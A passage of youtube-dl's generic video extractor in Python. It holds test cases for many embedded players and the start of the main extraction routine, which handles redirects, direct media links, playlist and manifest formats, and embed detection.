'url': 'https://dl.dropboxusercontent.com/u/29092637/interview.html',
'info_dict': {
'id': '4785848093001',
'ext': 'mp4',
'title': 'The Cardinal Pell Interview',
'description': 'Sky News Contributor Andrew Bolt interviews George Pell in Rome, following the Cardinal\'s evidence before the Royal Commission into Child Abuse. ',
'uploader': 'GlobeCast Australia - GlobeStream',
'uploader_id': '2733773828001',
'upload_date': '20160304',
'timestamp': 1457083087,
},
'params': {
# m3u8 downloads
'skip_download': True,
},
},
{
# Brightcove embed with whitespace around attribute names
'url': 'http://www.stack.com/video/3167554373001/learn-to-hit-open-three-pointers-with-damian-lillard-s-baseline-drift-drill',
'info_dict': {
'id': '3167554373001',
'ext': 'mp4',
'title': "Learn to Hit Open Three-Pointers With Damian Lillard's Baseline Drift Drill",
'description': 'md5:57bacb0e0f29349de4972bfda3191713',
'uploader_id': '1079349493',
'upload_date': '20140207',
'timestamp': 1391810548,
},
'params': {
'skip_download': True,
},
},
# Another form of arte.tv embed
{
'url': 'http://www.tv-replay.fr/redirection/09-04-16/arte-reportage-arte-11508975.html',
'md5': '850bfe45417ddf221288c88a0cffe2e2',
'info_dict': {
'id': '030273-562_PLUS7-F',
'ext': 'mp4',
'title': 'ARTE Reportage - Nulle part, en France',
'description': 'md5:e3a0e8868ed7303ed509b9e3af2b870d',
'upload_date': '20160409',
},
},
# LiveLeak embed
{
'url': 'http://www.wykop.pl/link/3088787/',
'md5': '7619da8c820e835bef21a1efa2a0fc71',
'info_dict': {
'id': '874_1459135191',
'ext': 'mp4',
'title': 'Man shows poor quality of new apartment building',
'description': 'The wall is like a sand pile.',
'uploader': 'Lake8737',
},
'add_ie': [LiveLeakIE.ie_key()],
},
# Another LiveLeak embed pattern (#13336)
{
'url': 'https://milo.yiannopoulos.net/2017/06/concealed-carry-robbery/',
'info_dict': {
'id': '2eb_1496309988',
'ext': 'mp4',
'title': 'Thief robs place where everyone was armed',
'description': 'md5:694d73ee79e535953cf2488562288eee',
'uploader': 'brazilwtf',
},
'add_ie': [LiveLeakIE.ie_key()],
},
# Duplicated embedded video URLs
{
'url': 'http://www.hudl.com/athlete/2538180/highlights/149298443',
'info_dict': {
'id': '149298443_480_16c25b74_2',
'ext': 'mp4',
'title': 'vs. Blue Orange Spring Game',
'uploader': 'www.hudl.com',
},
},
# twitter:player:stream embed
{
'url': 'http://www.rtl.be/info/video/589263.aspx?CategoryID=288',
'info_dict': {
'id': 'master',
'ext': 'mp4',
'title': 'Une nouvelle espèce de dinosaure découverte en Argentine',
'uploader': 'www.rtl.be',
},
'params': {
# m3u8 downloads
'skip_download': True,
},
},
# twitter:player embed
{
'url': 'http://www.theatlantic.com/video/index/484130/what-do-black-holes-sound-like/',
'md5': 'a3e0df96369831de324f0778e126653c',
'info_dict': {
'id': '4909620399001',
'ext': 'mp4',
'title': 'What Do Black Holes Sound Like?',
'description': 'what do black holes sound like',
'upload_date': '20160524',
'uploader_id': '29913724001',
'timestamp': 1464107587,
'uploader': 'TheAtlantic',
},
'add_ie': ['BrightcoveLegacy'],
},
# Facebook <iframe> embed
{
'url': 'https://www.hostblogger.de/blog/archives/6181-Auto-jagt-Betonmischer.html',
'md5': 'fbcde74f534176ecb015849146dd3aee',
'info_dict': {
'id': '599637780109885',
'ext': 'mp4',
'title': 'Facebook video #599637780109885',
},
},
# Facebook <iframe> embed, plugin video
{
'url': 'http://5pillarsuk.com/2017/06/07/tariq-ramadan-disagrees-with-pr-exercise-by-imams-refusing-funeral-prayers-for-london-attackers/',
'info_dict': {
'id': '1754168231264132',
'ext': 'mp4',
'title': 'About the Imams and Religious leaders refusing to perform funeral prayers for...',
'uploader': 'Tariq Ramadan (official)',
'timestamp': 1496758379,
'upload_date': '20170606',
},
'params': {
'skip_download': True,
},
},
# Facebook API embed
{
'url': 'http://www.lothype.com/blue-stars-2016-preview-standstill-full-show/',
'md5': 'a47372ee61b39a7b90287094d447d94e',
'info_dict': {
'id': '10153467542406923',
'ext': 'mp4',
'title': 'Facebook video #10153467542406923',
},
},
# Wordpress "YouTube Video Importer" plugin
{
'url': 'http://www.lothype.com/blue-devils-drumline-stanford-lot-2016/',
'md5': 'd16797741b560b485194eddda8121b48',
'info_dict': {
'id': 'HNTXWDXV9Is',
'ext': 'mp4',
'title': 'Blue Devils Drumline Stanford lot 2016',
'upload_date': '20160627',
'uploader_id': 'GENOCIDE8GENERAL10',
'uploader': 'cylus cyrus',
},
},
{
# video stored on custom kaltura server
'url': 'http://www.expansion.com/multimedia/videos.html?media=EQcM30NHIPv',
'md5': '537617d06e64dfed891fa1593c4b30cc',
'info_dict': {
'id': '0_1iotm5bh',
'ext': 'mp4',
'title': 'Elecciones británicas: 5 lecciones para Rajoy',
'description': 'md5:435a89d68b9760b92ce67ed227055f16',
'uploader_id': '[email protected]',
'upload_date': '20150429',
'timestamp': 1430303472,
},
'add_ie': ['Kaltura'],
},
{
# Non-standard Vimeo embed
'url': 'https://openclassrooms.com/courses/understanding-the-web',
'md5': '64d86f1c7d369afd9a78b38cbb88d80a',
'info_dict': {
'id': '148867247',
'ext': 'mp4',
'title': 'Understanding the web - Teaser',
'description': 'This is "Understanding the web - Teaser" by openclassrooms on Vimeo, the home for high quality videos and the people who love them.',
'upload_date': '20151214',
'uploader': 'OpenClassrooms',
'uploader_id': 'openclassrooms',
},
'add_ie': ['Vimeo'],
},
{
# generic vimeo embed that requires original URL passed as Referer
'url': 'http://racing4everyone.eu/2016/07/30/formula-1-2016-round12-germany/',
'only_matching': True,
},
{
'url': 'https://support.arkena.com/display/PLAY/Ways+to+embed+your+video',
'md5': 'b96f2f71b359a8ecd05ce4e1daa72365',
'info_dict': {
'id': 'b41dda37-d8e7-4d3f-b1b5-9a9db578bdfe',
'ext': 'mp4',
'title': 'Big Buck Bunny',
'description': 'Royalty free test video',
'timestamp': 1432816365,
'upload_date': '20150528',
'is_live': False,
},
'params': {
'skip_download': True,
},
'add_ie': [ArkenaIE.ie_key()],
},
{
'url': 'http://nova.bg/news/view/2016/08/16/156543/%D0%BD%D0%B0-%D0%BA%D0%BE%D1%81%D1%8A%D0%BC-%D0%BE%D1%82-%D0%B2%D0%B7%D1%80%D0%B8%D0%B2-%D0%BE%D1%82%D1%86%D0%B5%D0%BF%D0%B8%D1%85%D0%B0-%D1%86%D1%8F%D0%BB-%D0%BA%D0%B2%D0%B0%D1%80%D1%82%D0%B0%D0%BB-%D0%B7%D0%B0%D1%80%D0%B0%D0%B4%D0%B8-%D0%B8%D0%B7%D1%82%D0%B8%D1%87%D0%B0%D0%BD%D0%B5-%D0%BD%D0%B0-%D0%B3%D0%B0%D0%B7-%D0%B2-%D0%BF%D0%BB%D0%BE%D0%B2%D0%B4%D0%B8%D0%B2/',
'info_dict': {
'id': '1c7141f46c',
'ext': 'mp4',
'title': 'НА КОСЪМ ОТ ВЗРИВ: Изтичане на газ на бензиностанция в Пловдив',
},
'params': {
'skip_download': True,
},
'add_ie': [Vbox7IE.ie_key()],
},
{
# DBTV embeds
'url': 'http://www.dagbladet.no/2016/02/23/nyheter/nordlys/ski/troms/ver/43254897/',
'info_dict': {
'id': '43254897',
'title': 'Etter ett års planlegging, klaffet endelig alt: - Jeg måtte ta en liten dans',
},
'playlist_mincount': 3,
},
{
# Videa embeds
'url': 'http://forum.dvdtalk.com/movie-talk/623756-deleted-magic-star-wars-ot-deleted-alt-scenes-docu-style.html',
'info_dict': {
'id': '623756-deleted-magic-star-wars-ot-deleted-alt-scenes-docu-style',
'title': 'Deleted Magic - Star Wars: OT Deleted / Alt. Scenes Docu. Style - DVD Talk Forum',
},
'playlist_mincount': 2,
},
{
# 20 minuten embed
'url': 'http://www.20min.ch/schweiz/news/story/So-kommen-Sie-bei-Eis-und-Schnee-sicher-an-27032552',
'info_dict': {
'id': '523629',
'ext': 'mp4',
'title': 'So kommen Sie bei Eis und Schnee sicher an',
'description': 'md5:117c212f64b25e3d95747e5276863f7d',
},
'params': {
'skip_download': True,
},
'add_ie': [TwentyMinutenIE.ie_key()],
},
{
# VideoPress embed
'url': 'https://en.support.wordpress.com/videopress/',
'info_dict': {
'id': 'OcobLTqC',
'ext': 'm4v',
'title': 'IMG_5786',
'timestamp': 1435711927,
'upload_date': '20150701',
},
'params': {
'skip_download': True,
},
'add_ie': [VideoPressIE.ie_key()],
},
{
# Rutube embed
'url': 'http://magazzino.friday.ru/videos/vipuski/kazan-2',
'info_dict': {
'id': '9b3d5bee0a8740bf70dfd29d3ea43541',
'ext': 'flv',
'title': 'Магаззино: Казань 2',
'description': 'md5:99bccdfac2269f0e8fdbc4bbc9db184a',
'uploader': 'Магаззино',
'upload_date': '20170228',
'uploader_id': '996642',
},
'params': {
'skip_download': True,
},
'add_ie': [RutubeIE.ie_key()],
},
{
# ThePlatform embedded with whitespaces in URLs
'url': 'http://www.golfchannel.com/topics/shows/golftalkcentral.htm',
'only_matching': True,
},
{
# Senate ISVP iframe https
'url': 'https://www.hsgac.senate.gov/hearings/canadas-fast-track-refugee-plan-unanswered-questions-and-implications-for-us-national-security',
'md5': 'fb8c70b0b515e5037981a2492099aab8',
'info_dict': {
'id': 'govtaff020316',
'ext': 'mp4',
'title': 'Integrated Senate Video Player',
},
'add_ie': [SenateISVPIE.ie_key()],
},
{
# Limelight embeds (1 channel embed + 4 media embeds)
'url': 'http://www.sedona.com/FacilitatorTraining2017',
'info_dict': {
'id': 'FacilitatorTraining2017',
'title': 'Facilitator Training 2017',
},
'playlist_mincount': 5,
},
{
# Limelight embed (LimelightPlayerUtil.embed)
'url': 'https://tv5.ca/videos?v=xuu8qowr291ri',
'info_dict': {
'id': '95d035dc5c8a401588e9c0e6bd1e9c92',
'ext': 'mp4',
'title': '07448641',
'timestamp': 1499890639,
'upload_date': '20170712',
},
'params': {
'skip_download': True,
},
'add_ie': ['LimelightMedia'],
},
{
'url': 'http://kron4.com/2017/04/28/standoff-with-walnut-creek-murder-suspect-ends-with-arrest/',
'info_dict': {
'id': 'standoff-with-walnut-creek-murder-suspect-ends-with-arrest',
'title': 'Standoff with Walnut Creek murder suspect ends',
'description': 'md5:3ccc48a60fc9441eeccfc9c469ebf788',
},
'playlist_mincount': 4,
},
{
# WashingtonPost embed
'url': 'http://www.vanityfair.com/hollywood/2017/04/donald-trump-tv-pitches',
'info_dict': {
'id': '8caf6e88-d0ec-11e5-90d3-34c2c42653ac',
'ext': 'mp4',
'title': "No one has seen the drama series based on Trump's life \u2014 until now",
'description': 'Donald Trump wanted a weekly TV drama based on his life. It never aired. But The Washington Post recently obtained a scene from the pilot script — and enlisted actors.',
'timestamp': 1455216756,
'uploader': 'The Washington Post',
'upload_date': '20160211',
},
'add_ie': [WashingtonPostIE.ie_key()],
},
{
# Mediaset embed
'url': 'http://www.tgcom24.mediaset.it/politica/serracchiani-voglio-vivere-in-una-societa-aperta-reazioni-sproporzionate-_3071354-201702a.shtml',
'info_dict': {
'id': '720642',
'ext': 'mp4',
'title': 'Serracchiani: "Voglio vivere in una società aperta, con tutela del patto di fiducia"',
},
'params': {
'skip_download': True,
},
'add_ie': [MediasetIE.ie_key()],
},
{
# JOJ.sk embeds
'url': 'https://www.noviny.sk/slovensko/238543-slovenskom-sa-prehnala-vlna-silnych-burok',
'info_dict': {
'id': '238543-slovenskom-sa-prehnala-vlna-silnych-burok',
'title': 'Slovenskom sa prehnala vlna silných búrok',
},
'playlist_mincount': 5,
'add_ie': [JojIE.ie_key()],
},
{
# AMP embed (see https://www.ampproject.org/docs/reference/components/amp-video)
'url': 'https://tvrain.ru/amp/418921/',
'md5': 'cc00413936695987e8de148b67d14f1d',
'info_dict': {
'id': '418921',
'ext': 'mp4',
'title': 'Стас Намин: «Мы нарушили девственность Кремля»',
},
},
{
# vzaar embed
'url': 'http://help.vzaar.com/article/165-embedding-video',
'md5': '7e3919d9d2620b89e3e00bec7fe8c9d4',
'info_dict': {
'id': '8707641',
'ext': 'mp4',
'title': 'Building A Business Online: Principal Chairs Q & A',
},
},
{
# multiple HTML5 videos on one page
'url': 'https://www.paragon-software.com/home/rk-free/keyscenarios.html',
'info_dict': {
'id': 'keyscenarios',
'title': 'Rescue Kit 14 Free Edition - Getting started',
},
'playlist_count': 4,
},
{
# vshare embed
'url': 'https://youtube-dl-demo.neocities.org/vshare.html',
'md5': '17b39f55b5497ae8b59f5fbce8e35886',
'info_dict': {
'id': '0f64ce6',
'title': 'vl14062007715967',
'ext': 'mp4',
}
},
{
'url': 'http://www.heidelberg-laureate-forum.org/blog/video/lecture-friday-september-23-2016-sir-c-antony-r-hoare/',
'md5': 'aecd089f55b1cb5a59032cb049d3a356',
'info_dict': {
'id': '90227f51a80c4d8f86c345a7fa62bd9a1d',
'ext': 'mp4',
'title': 'Lecture: Friday, September 23, 2016 - Sir Tony Hoare',
'description': 'md5:5a51db84a62def7b7054df2ade403c6c',
'timestamp': 1474354800,
'upload_date': '20160920',
}
},
{
'url': 'http://www.kidzworld.com/article/30935-trolls-the-beat-goes-on-interview-skylar-astin-and-amanda-leighton',
'info_dict': {
'id': '1731611',
'ext': 'mp4',
'title': 'Official Trailer | TROLLS: THE BEAT GOES ON!',
'description': 'md5:eb5f23826a027ba95277d105f248b825',
'timestamp': 1516100691,
'upload_date': '20180116',
},
'params': {
'skip_download': True,
},
'add_ie': [SpringboardPlatformIE.ie_key()],
},
{
'url': 'https://www.youtube.com/shared?ci=1nEzmT-M4fU',
'info_dict': {
'id': 'uPDB5I9wfp8',
'ext': 'webm',
'title': 'Pocoyo: 90 minutos de episódios completos Português para crianças - PARTE 3',
'description': 'md5:d9e4d9346a2dfff4c7dc4c8cec0f546d',
'upload_date': '20160219',
'uploader': 'Pocoyo - Português (BR)',
'uploader_id': 'PocoyoBrazil',
},
'add_ie': [YoutubeIE.ie_key()],
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.yapfiles.ru/show/1872528/690b05d3054d2dbe1e69523aa21bb3b1.mp4.html',
'info_dict': {
'id': 'vMDE4NzI1Mjgt690b',
'ext': 'mp4',
'title': 'Котята',
},
'add_ie': [YapFilesIE.ie_key()],
'params': {
'skip_download': True,
},
},
{
# CloudflareStream embed
'url': 'https://www.cloudflare.com/products/cloudflare-stream/',
'info_dict': {
'id': '31c9291ab41fac05471db4e73aa11717',
'ext': 'mp4',
'title': '31c9291ab41fac05471db4e73aa11717',
},
'add_ie': [CloudflareStreamIE.ie_key()],
'params': {
'skip_download': True,
},
},
{
# PeerTube embed
'url': 'https://joinpeertube.org/fr/home/',
'info_dict': {
'id': 'home',
'title': 'Reprenez le contrôle de vos vidéos ! #JoinPeertube',
},
'playlist_count': 2,
},
{
# Indavideo embed
'url': 'https://streetkitchen.hu/receptek/igy_kell_otthon_hamburgert_sutni/',
'info_dict': {
'id': '1693903',
'ext': 'mp4',
'title': 'Így kell otthon hamburgert sütni',
'description': 'md5:f5a730ecf900a5c852e1e00540bbb0f7',
'timestamp': 1426330212,
'upload_date': '20150314',
'uploader': 'StreetKitchen',
'uploader_id': '546363',
},
'add_ie': [IndavideoEmbedIE.ie_key()],
'params': {
'skip_download': True,
},
},
{
# APA embed via JWPlatform embed
'url': 'http://www.vol.at/blue-man-group/5593454',
'info_dict': {
'id': 'jjv85FdZ',
'ext': 'mp4',
'title': '"Blau ist mysteriös": Die Blue Man Group im Interview',
'description': 'md5:d41d8cd98f00b204e9800998ecf8427e',
'thumbnail': r're:^https?://.*\.jpg$',
'duration': 254,
'timestamp': 1519211149,
'upload_date': '20180221',
},
'params': {
'skip_download': True,
},
},
{
'url': 'http://share-videos.se/auto/video/83645793?uid=13',
'md5': 'b68d276de422ab07ee1d49388103f457',
'info_dict': {
'id': '83645793',
'title': 'Lock up and get excited',
'ext': 'mp4'
},
'skip': 'TODO: fix nested playlists processing in tests',
},
{
# Viqeo embeds
'url': 'https://viqeo.tv/',
'info_dict': {
'id': 'viqeo',
'title': 'All-new video platform',
},
'playlist_count': 6,
},
{
# Squarespace video embed, 2019-08-28
'url': 'http://ootboxford.com',
'info_dict': {
'id': 'Tc7b_JGdZfw',
'title': 'Out of the Blue, at Childish Things 10',
'ext': 'mp4',
'description': 'md5:a83d0026666cf5ee970f8bd1cfd69c7f',
'uploader_id': 'helendouglashouse',
'uploader': 'Helen & Douglas House',
'upload_date': '20140328',
},
'params': {
'skip_download': True,
},
},
{
# Zype embed
'url': 'https://www.cookscountry.com/episode/554-smoky-barbecue-favorites',
'info_dict': {
'id': '5b400b834b32992a310622b9',
'ext': 'mp4',
'title': 'Smoky Barbecue Favorites',
'thumbnail': r're:^https?://.*\.jpe?g',
'description': 'md5:5ff01e76316bd8d46508af26dc86023b',
'upload_date': '20170909',
'timestamp': 1504915200,
},
'add_ie': [ZypeIE.ie_key()],
'params': {
'skip_download': True,
},
},
{
# videojs embed
'url': 'https://video.sibnet.ru/shell.php?videoid=3422904',
'info_dict': {
'id': 'shell',
'ext': 'mp4',
'title': 'Доставщик пиццы спросил разрешения сыграть на фортепиано',
'description': 'md5:89209cdc587dab1e4a090453dbaa2cb1',
'thumbnail': r're:^https?://.*\.jpg$',
},
'params': {
'skip_download': True,
},
'expected_warnings': ['Failed to download MPD manifest'],
},
{
# DailyMotion embed with DM.player
'url': 'https://www.beinsports.com/us/copa-del-rey/video/the-locker-room-valencia-beat-barca-in-copa/1203804',
'info_dict': {
'id': 'k6aKkGHd9FJs4mtJN39',
'ext': 'mp4',
'title': 'The Locker Room: Valencia Beat Barca In Copa del Rey Final',
'description': 'This video is private.',
'uploader_id': 'x1jf30l',
'uploader': 'beIN SPORTS USA',
'upload_date': '20190528',
'timestamp': 1559062971,
},
'params': {
'skip_download': True,
},
},
# {
# # TODO: find another test
# # http://schema.org/VideoObject
# 'url': 'https://flipagram.com/f/nyvTSJMKId',
# 'md5': '888dcf08b7ea671381f00fab74692755',
# 'info_dict': {
# 'id': 'nyvTSJMKId',
# 'ext': 'mp4',
# 'title': 'Flipagram by sjuria101 featuring Midnight Memories by One Direction',
# 'description': '#love for cats.',
# 'timestamp': 1461244995,
# 'upload_date': '20160421',
# },
# 'params': {
# 'force_generic_extractor': True,
# },
# }
]
def report_following_redirect(self, new_url):
"""Report information extraction."""
self._downloader.to_screen('[redirect] Following redirect to %s' % new_url)
def _extract_rss(self, url, video_id, doc):
playlist_title = doc.find('./channel/title').text
playlist_desc_el = doc.find('./channel/description')
playlist_desc = None if playlist_desc_el is None else playlist_desc_el.text
entries = []
for it in doc.findall('./channel/item'):
next_url = None
enclosure_nodes = it.findall('./enclosure')
for e in enclosure_nodes:
next_url = e.attrib.get('url')
if next_url:
break
if not next_url:
next_url = xpath_text(it, 'link', fatal=False)
if not next_url:
continue
entries.append({
'_type': 'url_transparent',
'url': next_url,
'title': it.find('title').text,
})
return {
'_type': 'playlist',
'id': url,
'title': playlist_title,
'description': playlist_desc,
'entries': entries,
}
def _extract_camtasia(self, url, video_id, webpage):
""" Returns None if no camtasia video can be found. """
camtasia_cfg = self._search_regex(
r'fo\.addVariable\(\s*"csConfigFile",\s*"([^"]+)"\s*\);',
webpage, 'camtasia configuration file', default=None)
if camtasia_cfg is None:
return None
title = self._html_search_meta('DC.title', webpage, fatal=True)
camtasia_url = compat_urlparse.urljoin(url, camtasia_cfg)
camtasia_cfg = self._download_xml(
camtasia_url, video_id,
note='Downloading camtasia configuration',
errnote='Failed to download camtasia configuration')
fileset_node = camtasia_cfg.find('./playlist/array/fileset')
entries = []
for n in fileset_node:
url_n = n.find('./uri')
if url_n is None:
continue
entries.append({
'id': os.path.splitext(url_n.text.rpartition('/')[2])[0],
'title': '%s - %s' % (title, n.tag),
'url': compat_urlparse.urljoin(url, url_n.text),
'duration': float_or_none(n.find('./duration').text),
})
return {
'_type': 'playlist',
'entries': entries,
'title': title,
}
def _real_extract(self, url):
if url.startswith('//'):
return self.url_result(self.http_scheme() + url)
parsed_url = compat_urlparse.urlparse(url)
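# No scheme supplied: decide what to do based on the --default-search option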
if not parsed_url.scheme:
default_search = self._downloader.params.get('default_search')
if default_search is None:
default_search = 'fixup_error'
if default_search in ('auto', 'auto_warning', 'fixup_error'):
if re.match(r'^[^\s/]+\.[^\s/]+/', url):
self._downloader.report_warning('The url doesn\'t specify the protocol, trying with http')
return self.url_result('http://' + url)
elif default_search != 'fixup_error':
if default_search == 'auto_warning':
if re.match(r'^(?:url|URL)$', url):
raise ExtractorError(
'Invalid URL: %r . Call youtube-dl like this: youtube-dl -v "https://www.youtube.com/watch?v=BaW_jenozKc" ' % url,
expected=True)
else:
self._downloader.report_warning(
'Falling back to youtube search for %s . Set --default-search "auto" to suppress this warning.' % url)
return self.url_result('ytsearch:' + url)
if default_search in ('error', 'fixup_error'):
raise ExtractorError(
'%r is not a valid URL. '
'Set --default-search "ytsearch" (or run youtube-dl "ytsearch:%s" ) to search YouTube'
% (url, url), expected=True)
else:
if ':' not in default_search:
default_search += ':'
return self.url_result(default_search + url)
url, smuggled_data = unsmuggle_url(url)
force_videoid = None
is_intentional = smuggled_data and smuggled_data.get('to_generic')
if smuggled_data and 'force_videoid' in smuggled_data:
force_videoid = smuggled_data['force_videoid']
video_id = force_videoid
else:
video_id = self._generic_id(url)
self.to_screen('%s: Requesting header' % video_id)
head_req = HEADRequest(url)
head_response = self._request_webpage(
head_req, video_id,
note=False, errnote='Could not send HEAD request to %s' % url,
fatal=False)
if head_response is not False:
# Check for redirect
new_url = compat_str(head_response.geturl())
if url != new_url:
self.report_following_redirect(new_url)
if force_videoid:
new_url = smuggle_url(
new_url, {'force_videoid': force_videoid})
return self.url_result(new_url)
full_response = None
if head_response is False:
request = sanitized_Request(url)
request.add_header('Accept-Encoding', '*')
full_response = self._request_webpage(request, video_id)
head_response = full_response
info_dict = {
'id': video_id,
'title': self._generic_title(url),
'upload_date': unified_strdate(head_response.headers.get('Last-Modified'))
}
# Check for direct link to a video
content_type = head_response.headers.get('Content-Type', '').lower()
m = re.match(r'^(?P<type>audio|video|application(?=/(?:ogg$|(?:vnd\.apple\.|x-)?mpegurl)))/(?P<format_id>[^;\s]+)', content_type)
if m:
format_id = compat_str(m.group('format_id'))
if format_id.endswith('mpegurl'):
formats = self._extract_m3u8_formats(url, video_id, 'mp4')
elif format_id == 'f4m':
formats = self._extract_f4m_formats(url, video_id)
else:
formats = [{
'format_id': format_id,
'url': url,
'vcodec': 'none' if m.group('type') == 'audio' else None
}]
info_dict['direct'] = True
self._sort_formats(formats)
info_dict['formats'] = formats
return info_dict
if not self._downloader.params.get('test', False) and not is_intentional:
force = self._downloader.params.get('force_generic_extractor', False)
self._downloader.report_warning(
'%s on generic information extractor.' % ('Forcing' if force else 'Falling back'))
if not full_response:
request = sanitized_Request(url)
# Some webservers may serve compressed content of rather big size (e.g. gzipped flac),
# making it impossible to download only a chunk of the file (yet we need only 512kB to
# test whether it's HTML or not). With youtube-dl's default Accept-Encoding that would
# always result in downloading the whole file, which is not desirable.
# Therefore, for the extraction pass we have to override Accept-Encoding to any in order
# to accept raw bytes and be able to download only a chunk.
# It would probably be better to solve this by checking Content-Type for
# application/octet-stream after the HEAD request finishes, but it is not clear
# whether we can rely on that.
request.add_header('Accept-Encoding', '*')
full_response = self._request_webpage(request, video_id)
first_bytes = full_response.read(512)
# Is it an M3U playlist?
if first_bytes.startswith(b'#EXTM3U'):
info_dict['formats'] = self._extract_m3u8_formats(url, video_id, 'mp4')
self._sort_formats(info_dict['formats'])
return info_dict
# Maybe it's a direct link to a video?
# Be careful not to download the whole thing!
if not is_html(first_bytes):
self._downloader.report_warning(
'URL could be a direct video link, returning it as such.')
info_dict.update({
'direct': True,
'url': url,
})
return info_dict
webpage = self._webpage_read_content(
full_response, url, video_id, prefix=first_bytes)
self.report_extraction(video_id)
# Is it an RSS feed, a SMIL file, an XSPF playlist or an MPD manifest?
try:
doc = compat_etree_fromstring(webpage.encode('utf-8'))
if doc.tag == 'rss':
return self._extract_rss(url, video_id, doc)
elif doc.tag == 'SmoothStreamingMedia':
info_dict['formats'] = self._parse_ism_formats(doc, url)
self._sort_formats(info_dict['formats'])
return info_dict
elif re.match(r'^(?:{[^}]+})?smil$', doc.tag):
smil = self._parse_smil(doc, url, video_id)
self._sort_formats(smil['formats'])
return smil
elif doc.tag == '{http://xspf.org/ns/0/}playlist':
return self.playlist_result(
self._parse_xspf(
doc, video_id, xspf_url=url,
xspf_base_url=compat_str(full_response.geturl())),
video_id)
elif re.match(r'(?i)^(?:{[^}]+})?MPD$', doc.tag):
info_dict['formats'] = self._parse_mpd_formats(
doc,
mpd_base_url=compat_str(full_response.geturl()).rpartition('/')[0],
mpd_url=url)
self._sort_formats(info_dict['formats'])
return info_dict
elif re.match(r'^{http://ns\.adobe\.com/f4m/[12]\.0}manifest$', doc.tag):
info_dict['formats'] = self._parse_f4m_formats(doc, url, video_id)
self._sort_formats(info_dict['formats'])
return info_dict
except compat_xml_parse_error:
pass
# Is it a Camtasia project?
camtasia_res = self._extract_camtasia(url, video_id, webpage)
if camtasia_res is not None:
return camtasia_res
# Sometimes the embedded video player is hidden behind percent encoding
# (e.g. https://github.com/ytdl-org/youtube-dl/issues/2448)
# Unescaping the whole page makes it possible to handle those cases in a generic way
webpage = compat_urllib_parse_unquote(webpage)
# Unescape squarespace embeds to be detected by generic extractor,
# see https://github.com/ytdl-org/youtube-dl/issues/21294
webpage = re.sub(
r'<div[^>]+class=[^>]*?\bsqs-video-wrapper\b[^>]*>',
lambda x: unescapeHTML(x.group(0)), webpage)
# it's tempting to parse this further, but you would
# have to take into account all the variations like
# Video Title - Site Name
# Site Name | Video Title
# Video Title - Tagline | Site Name
# and so on and so forth; it's just not practical
video_title = self._og_search_title(
webpage, default=None) or self._html_search_regex(
r'(?s)<title>(.*?)</title>', webpage, 'video title',
default='video')
# Try to detect age limit automatically
age_limit = self._rta_search(webpage)
# And then there are the jokers who advertise that they use RTA,
# but actually don't.
AGE_LIMIT_MARKERS = [
r'Proudly Labeled <a href="http://www\.rtalabel\.org/" title="Restricted to Adults">RTA</a>',
]
if any(re.search(marker, webpage) for marker in AGE_LIMIT_MARKERS):
age_limit = 18
# video uploader is domain name
video_uploader = self._search_regex(
r'^(?:https?://)?([^/]*)/.*', url, 'video uploader')
video_description = self._og_search_description(webpage, default=None)
video_thumbnail = self._og_search_thumbnail(webpage, default=None)
info_dict.update({
'title': video_title,
'description': video_description,
'thumbnail': video_thumbnail,
'age_limit': age_limit,
})
# Look for Brightcove Legacy Studio embeds
bc_urls = BrightcoveLegacyIE._extract_brightcove_urls(webpage)
if bc_urls:
entries = [{
'_type': 'url',
'url': smuggle_url(bc_url, {'Referer': url}),
'ie_key': 'BrightcoveLegacy'
} for bc_url in bc_urls]
return {
'_type': 'playlist',
'title': video_title,
'id': video_id,
'entries': entries,
}
# Look for Brightcove New Studio embeds
bc_urls = BrightcoveNewIE._extract_urls(self, webpage)
if bc_urls:
return self.playlist_from_matches(
bc_urls, video_id, video_title,
getter=lambda x: smuggle_url(x, {'referrer': url}),
ie='BrightcoveNew')
# Look for Nexx embeds
nexx_urls = NexxIE._extract_urls(webpage)
if nexx_urls:
return self.playlist_from_matches(nexx_urls, video_id, video_title, ie=NexxIE.ie_key())
# Look for Nexx iFrame embeds
nexx_embed_urls = NexxEmbedIE._extract_urls(webpage)
if nexx_embed_urls:
return self.playlist_from_matches(nexx_embed_urls, video_id, video_title, ie=NexxEmbedIE.ie_key())
# Look for ThePlatform embeds
tp_urls = ThePlatformIE._extract_urls(webpage)
if tp_urls:
return self.playlist_from_matches(tp_urls, video_id, video_title, ie='ThePlatform')
# Look for embedded rtl.nl player
matches = re.findall(
r'<iframe[^>]+?src="((?:https?:)?//(?:(?:www|static)\.)?rtl\.nl/(?:system/videoplayer/[^"]+(?:video_)?)?embed[^"]+)"',
webpage)
if matches:
return self.playlist_from_matches(matches, video_id, video_title, ie='RtlNl')
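# Look for Vimeo embeds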
vimeo_urls = VimeoIE._extract_urls(url, webpage)
if vimeo_urls:
return self.playlist_from_matches(vimeo_urls, video_id, video_title, ie=VimeoIE.ie_key())
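# Look for embedded vid.me player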
vid_me_embed_url = self._search_regex(
r'src=[\'"](https?://vid\.me/[^\'"]+)[\'"]',
webpage, 'vid.me embed', default=None)
if vid_me_embed_url is not None:
return self.url_result(vid_me_embed_url, 'Vidme')
# Look for YouTube embeds
youtube_urls = YoutubeIE._extract_urls(webpage)
if youtube_urls:
return self.playlist_from_matches(
youtube_urls, video_id, video_title, ie=YoutubeIE.ie_key())
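# Look for Dailymotion embeds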
matches = DailymotionIE._extract_urls(webpage)
if matches:
return self.playlist_from_matches(matches, video_id, video_title)
# Look for embedded Dailymotion playlist player (#3822)
m = re.search(
r'<iframe[^>]+?src=(["\'])(?P<url>(?:https?:)?//(?:www\.)?dailymotion\.[a-z]{2,3}/widget/jukebox\?.+?)\1', webpage)
if m:
playlists = re.findall(
r'list\[\]=/playlist/([^/]+)/', unescapeHTML(m.group('url')))
if playlists:
return self.playlist_from_matches(
playlists, video_id, video_title, lambda p: '//dailymotion.com/playlist/%s' % p)
# Look for DailyMail embeds
dailymail_urls = DailyMailIE._extract_urls(webpage)
if dailymail_urls:
return self.playlist_from_matches(
dailymail_urls, video_id, video_title, ie=DailyMailIE.ie_key())
# Look for embedded Wistia player
wistia_urls = WistiaIE._extract_urls(webpage)
if wistia_urls:
playlist = self.playlist_from_matches(wistia_urls, video_id, video_title, ie=WistiaIE.ie_key())
for entry in playlist['entries']:
entry.update({
'_type': 'url_transparent',
'uploader': video_uploader,
})
return playlist
# Look for SVT player
svt_url = SVTIE._extract_url(webpage)
if svt_url:
return self.url_result(svt_url, 'SVT')
# Look for Bandcamp pages with custom domain
mobj = re.search(r'<meta property="og:url"[^>]*?content="(.*?bandcamp\.com.*?)"', webpage)
if mobj is not None:
